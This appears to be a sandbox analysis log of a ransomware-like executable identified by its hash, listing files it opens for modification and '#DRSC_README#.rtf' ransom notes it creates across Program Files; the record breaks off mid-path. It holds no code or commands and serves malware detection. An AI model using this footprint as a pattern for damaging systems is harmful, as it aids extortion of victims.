C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\he.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ko.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\EnterSearch.mid 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoDev.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Install\{C2992E49-2AEA-49C3-A145-FACF92F54BB3}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\Logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program 